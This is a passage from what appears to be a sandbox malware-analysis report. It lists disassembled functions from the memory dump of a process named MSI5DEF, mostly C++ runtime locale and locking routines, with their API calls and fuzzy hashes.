                                                                        • Instruction ID: a0d87f0187475253d0e5ba1a721fff50cb8ed70d5a56951a42d23b7113065df5
                                                                        • Opcode Fuzzy Hash: b697603f96c31790778e7dae5865e161bc6eb36b58b2812506aeeb5e61b693b7
                                                                        • Instruction Fuzzy Hash: 47D17CB5E046589FCF15CFA8E8809ADBBF4FF09300F1845AAE859E7351DB30A942CB54
                                                                        Function 00AF8872 Relevance: 6.3, APIs: 4, Instructions: 313COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: fb0574b2a34db014c636cb2581c4ac580978b216ccf11040f0199f2a3381584e
                                                                        • Instruction ID: 072fa41c4b1c9e9f5bef60e45d15391937d7a7b662e2d5a50c7d03f93b71a011
                                                                        • Opcode Fuzzy Hash: fb0574b2a34db014c636cb2581c4ac580978b216ccf11040f0199f2a3381584e
                                                                        • Instruction Fuzzy Hash: 0AC1447190024D9FDF15DFD8C9849FEBBB9EF48340F24405AFA05AB251DB34AA45CBA0
                                                                        Function 00AF2A16 Relevance: 6.3, APIs: 4, Instructions: 310COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                        • String ID:
                                                                        • API String ID: 838279627-0
                                                                        • Opcode ID: ee3e39a898dba5b9377efa791c7a8482a5d8cdb0e4a71c6b04dd1bf5cc6df57b
                                                                        • Instruction ID: c0007d8d193ef31609ba186fa6cc7221cab7cd19299ca5720971f10bd9a4f3b0
                                                                        • Opcode Fuzzy Hash: ee3e39a898dba5b9377efa791c7a8482a5d8cdb0e4a71c6b04dd1bf5cc6df57b
                                                                        • Instruction Fuzzy Hash: 7BC1347190024D9FDF15DFE8C980AFEBBB9EB48310F24441AFA05AB251D734AE45CBA1
                                                                        Function 00B04F20 Relevance: 6.3, APIs: 4, Instructions: 277COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B04F27
                                                                        • collate.LIBCPMT ref: 00B04F33
                                                                          • Part of subcall function 00B03E70: __EH_prolog3_GS.LIBCMT ref: 00B03E77
                                                                          • Part of subcall function 00B03E70: __Getcoll.LIBCPMT ref: 00B03EDB
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • __Getcoll.LIBCPMT ref: 00B04F76
                                                                          • Part of subcall function 00B03CD4: __EH_prolog3.LIBCMT ref: 00B03CDB
                                                                          • Part of subcall function 00B03CD4: std::_Lockit::_Lockit.LIBCPMT ref: 00B03CE5
                                                                          • Part of subcall function 00B03CD4: std::_Lockit::~_Lockit.LIBCPMT ref: 00B03D56
                                                                          • Part of subcall function 00AF4403: __EH_prolog3.LIBCMT ref: 00AF440A
                                                                          • Part of subcall function 00AF4403: std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
                                                                          • Part of subcall function 00AF4403: std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
                                                                        • numpunct.LIBCPMT ref: 00B051A6
                                                                          • Part of subcall function 00AE84C0: LocalAlloc.KERNEL32(00000040,00000000,00B0839D,00000000,1816BA6E,?,00000000,?,00000000,?,00B2CB8D,000000FF,?,00AE17D5,00000000,00B2D3BA), ref: 00AE84C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$Getcoll$AllocH_prolog3_Localcollatenumpunct
                                                                        • String ID:
                                                                        • API String ID: 2732324234-0
                                                                        • Opcode ID: ed270abddae933db0ff3d992346d9f24b2784827d1011d883287b0685052e152
                                                                        • Instruction ID: 74bca2dde93c6f72de414169e0fc4bb8b3bdc34eb648b35f751de32d0bcfa096
                                                                        • Opcode Fuzzy Hash: ed270abddae933db0ff3d992346d9f24b2784827d1011d883287b0685052e152
                                                                        • Instruction Fuzzy Hash: 9B9108B2C04616ABD731ABA58906B7F7EE8EF85750F10459DF959A72C1EF308D008BE1
                                                                        Function 00B0AFD5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        • Opcode ID: 02efc162ffbf20b8255ab3c60f6f906136d790ac5806733013e9592742e706a2
                                                                        • Instruction ID: 9fd69109de39a1ce92e54e2f5539b5bdfd35c0adb4238f8385c94ba7fbdc0bd1
                                                                        • Opcode Fuzzy Hash: 02efc162ffbf20b8255ab3c60f6f906136d790ac5806733013e9592742e706a2
                                                                        • Instruction Fuzzy Hash: 7B51AC72601606AFEB298F54D891F6A7BE4FF04310F1445A9EC52972E1EB32ED91CB90
                                                                        Function 00B17B18 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0b3ec3a0dfdb54d6d52626f6d08431120c995e888b5cb0a417cf0b3b3683cec
                                                                        • Instruction ID: c65f06a20be8307db0db17e5a9cbee8858ff2c0a75e515c8b50894df96edd4e5
                                                                        • Opcode Fuzzy Hash: d0b3ec3a0dfdb54d6d52626f6d08431120c995e888b5cb0a417cf0b3b3683cec
                                                                        • Instruction Fuzzy Hash: 3A218E7124C205AFDB20AF71C890DAB7BF9EF0036879045A5F915D7641EF31EC8087A0
                                                                        Function 00AE9020 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,00000000,75EF5490,00AE8B3A,00000000,?,?,?,?,?,?,?,00000000,00B2A285,000000FF), ref: 00AE9027
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                        • API String ID: 1452528299-1781106413
                                                                        • Opcode ID: 83f2496090b6c5105aec201d66362fd9fb28915ee67f80471d075075ad21c244
                                                                        • Instruction ID: 843774d9db1d2746f412d3ad423fb3078d409cce617c698b49700ba6529b88cf
                                                                        • Opcode Fuzzy Hash: 83f2496090b6c5105aec201d66362fd9fb28915ee67f80471d075075ad21c244
                                                                        • Instruction Fuzzy Hash: 6E218E49A202A186CB701F2E841173AA2F0EF54755F65046FD9C9D7395FB698D81C391
                                                                        Function 00AF4403 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF440A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF4414
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF44BB
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00AF44C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                        • String ID:
                                                                        • API String ID: 4244582100-0
                                                                        • Opcode ID: 920b2d050763163aeab045f7bf442643aea1ce74e0c6438154855ee5cc602fbe
                                                                        • Instruction ID: f1b9e904792d446baeb370bdd7f12902194c80c4d0d25325081e9e61558ff160
                                                                        • Opcode Fuzzy Hash: 920b2d050763163aeab045f7bf442643aea1ce74e0c6438154855ee5cc602fbe
                                                                        • Instruction Fuzzy Hash: 42212A34A0061A9FCB14EF54C891A69B7A1FF49711F008459EA16AB3A1DF30ED51CF80
                                                                        Function 00AF1400 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,1816BA6E), ref: 00AF143C
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF145C
                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF148D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00AF14A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                        • String ID:
                                                                        • API String ID: 3604237281-0
                                                                        • Opcode ID: 8623a7c4611b1767cf5a81e334a4dba51bd19af2eaf444a4b1429496f95271ce
                                                                        • Instruction ID: fb78ad9ec5b74fe0a5d601594a1a5fb9ccf1f7b913d87a93b955c89601c03503
                                                                        • Opcode Fuzzy Hash: 8623a7c4611b1767cf5a81e334a4dba51bd19af2eaf444a4b1429496f95271ce
                                                                        • Instruction Fuzzy Hash: 6F21AF71940318EBD7208F54DC09FABBBF8EB45B24F204259F600A72D0DBB45A058BA4
                                                                        Function 00AF80C5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF80CC
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF80D6
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8127
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8147
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 25ae2f903c5b81531d2722e7b1363c62ebc95d07ca118ff0f3a88157f80ece5f
                                                                        • Instruction ID: bdf8c598e834402f7de51c7320f99385379837945fede8a5b8b8debbd0180ee4
                                                                        • Opcode Fuzzy Hash: 25ae2f903c5b81531d2722e7b1363c62ebc95d07ca118ff0f3a88157f80ece5f
                                                                        • Instruction Fuzzy Hash: 3E01D27590065DDBCF01EBA4C9456BE7BB1AF84710F240609F6206B3D2DF349E02CB95
                                                                        Function 00AF81EF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF81F6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8200
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8251
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF8271
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 28f515215426ada08b7a09e9844f5572cd0d737ebf0afe71d760900020b762a2
                                                                        • Instruction ID: 743e53f037df1ab92bbc62e0531793f9719e1c00588a5e81536fbf2de8ce4d3d
                                                                        • Opcode Fuzzy Hash: 28f515215426ada08b7a09e9844f5572cd0d737ebf0afe71d760900020b762a2
                                                                        • Instruction Fuzzy Hash: B301C43694061D8BCB01EBE4C9456BE77B1BF84310F240409FA2067291DF34AF018B90
                                                                        Function 00AF815A Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF8161
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF816B
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF81BC
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF81DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 3ea00b2d90c19b3aba22369957fe2ba328488c715ae558076ba4fd9e583c8271
                                                                        • Instruction ID: 261a7fb301ba5f299534fefdc3c33e3f0fa69a0d3a428f8104866be71a87babb
                                                                        • Opcode Fuzzy Hash: 3ea00b2d90c19b3aba22369957fe2ba328488c715ae558076ba4fd9e583c8271
                                                                        • Instruction Fuzzy Hash: D301C07690061D9BCB05EBA4C9497BE7BA1BF88320F240609F6116B392CF349E029B95
                                                                        Function 00AF26F9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF2700
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF270A
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF275B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF277B
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 27d8d2d034e38f52ab16c7914e8146cb2ea18d8f301c86f345cbab560a73b4d7
                                                                        • Instruction ID: 2947d2c33c47c2875bfeb74455f13be7512d11789685fc20579bf987d0e0f9cf
                                                                        • Opcode Fuzzy Hash: 27d8d2d034e38f52ab16c7914e8146cb2ea18d8f301c86f345cbab560a73b4d7
                                                                        • Instruction Fuzzy Hash: 0D01807590065D9BCB05FBE4C9557BEBBA1AF98310F240549F6206B291DF349E029B90
                                                                        Function 00AF278E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF2795
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF279F
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF27F0
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF2810
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 1b7c711ca91e5d18abef545fc26e3ae323036e24de39a2c0b929c12ca84d3006
                                                                        • Instruction ID: 07cc855273a8adadf8edd6b05f07f0b0370f8e6b2f0ea24724e93a9f0455b4cf
                                                                        • Opcode Fuzzy Hash: 1b7c711ca91e5d18abef545fc26e3ae323036e24de39a2c0b929c12ca84d3006
                                                                        • Instruction Fuzzy Hash: 6701CC3690061D9BCB05FBE4D905BBE7BA1BF84320F240409F611AB2D2DF349E028BD0
                                                                        Function 00B039EB Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B039F2
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B039FC
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03A4D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03A6D
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: a1ecc8905d8b4f9f8353fc5e9f50e77c4dab5c1763e252f6624ab3ac78f2f0b3
                                                                        • Instruction ID: 64ce6f9f9e4c9e2b79a46a0ad02d8890fdf9065e9a36bb8ff91c49dbb066f744
                                                                        • Opcode Fuzzy Hash: a1ecc8905d8b4f9f8353fc5e9f50e77c4dab5c1763e252f6624ab3ac78f2f0b3
                                                                        • Instruction Fuzzy Hash: D001AD769006199FCB01EBA8C9496BE7BE5AF84710F244049F5106B2D1DF349F068B90
                                                                        Function 00AF79C9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF79D0
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF79DA
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7A2B
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7A4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                        • String ID:
                                                                        • API String ID: 2854358121-0
                                                                        • Opcode ID: 142de9284f3aae6922fdd6b162f95d24be45503fdda01aecdc9827d0c88ba43d
                                                                        • Instruction ID: 49237b5109ca427cb71e9be58ca1c40b691a4afd084da8468659439c891dbf86
                                                                        • Opcode Fuzzy Hash: 142de9284f3aae6922fdd6b162f95d24be45503fdda01aecdc9827d0c88ba43d
                                                                        • Instruction Fuzzy Hash: 9701D23690466DDFCB11FBA4D9456BE7BB1AF84310F250449F620AB2D2CF349F018B91
                                                                        Function 00B03A80 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03A87
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03A91
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
